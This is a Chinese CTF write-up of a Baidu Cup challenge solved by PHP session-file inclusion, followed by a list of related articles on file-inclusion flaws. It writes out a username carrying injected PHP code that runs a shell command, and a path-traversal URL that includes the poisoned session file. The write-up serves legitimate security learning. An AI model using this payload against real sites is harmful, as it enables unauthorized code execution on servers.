i春秋上百度杯十二月中的一道题目-看看我的Notebook

创建题目

深度截图_选择区域_20171219133537.png

具有注册和登录功能，随便注册一个登录发现：

深度截图_选择区域_20171219133649.png

得到线索there is no flag

根据题目标题以及提示得知该题目应该是session文件包含类型

之后在robots.txt发现php1nFo.php文件

http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=php&file=php1nFo

深度截图_选择区域_20171219134009.png

在phpinfo中发现session文件存放位置以及open_basedir

深度截图_选择区域_20171219134118.png

深度截图_选择区域_20171219134152.png

然后结合注册功能，注册一个特殊的用户名,例如：

<?php eval('echo `ls -al`;');?>

之后构造payload：

http://ceb4e4f921b2444eaeb20d272f7a9cef79afe475f5c7447f.game.ichunqiu.com/action.php?module=txt&file=../../../tmp/SESS/sess_m9pfnnrf42eiirong93584f990

flag在注释中

一道CTF-session文件包含
i春秋上百度杯十二月中的一道题目-看看我的Notebook 创建题目具有注册和登录功能，随便注册一个登录发现： ...
一道文件包含的题
题目叫读取/etc/passwd 浏览器输入http://183.213.11.*:4414/stage/11/g...
【文件包含】PHP文件包含漏洞
0x01 文件包含函数 include() include_once() require() require_on...
文件包含
本文作者是一个白的不能再白的小白的写的，自身的水平有限，本着分享的态度，如遇到不对的地方，希望大家多多提意见。文...
文件包含
如何侵入系统 1 程序通过【包含函数】调用本地或远程文件，来实现漏洞上传。2 被包含的文件是各种格式，文件中可能就...
文件包含
一.本文介绍 1、本文介绍文件本地包含（LIF）、远程包含（RLF）、包含日志文件、包含读文件、包含截断、str_...
2019-09-02 文件包含和几个伪协议
本地文件包含和远程文件包含：本地文件包含：只要内容中带有即可解析成php文件执行。即使包含的文件...
Jar和arr的区别
jar:只包含class文件与清单文件，不包含资源文件； arr:包含所有资源、class文件和res文件;
Shell脚本语言：文件包含、cat命令、获取用户输入（5）
一、文件包含：1、文件B包含文件A：示例代码： 2、文件B包含文件A：示例代码：二、cat命令：作用：语法：...
文件包含漏洞
文件包含常见文件包含函数利用条件程序用include()等文件包含函数通过动态变量的范式引入需要包含的文件 ...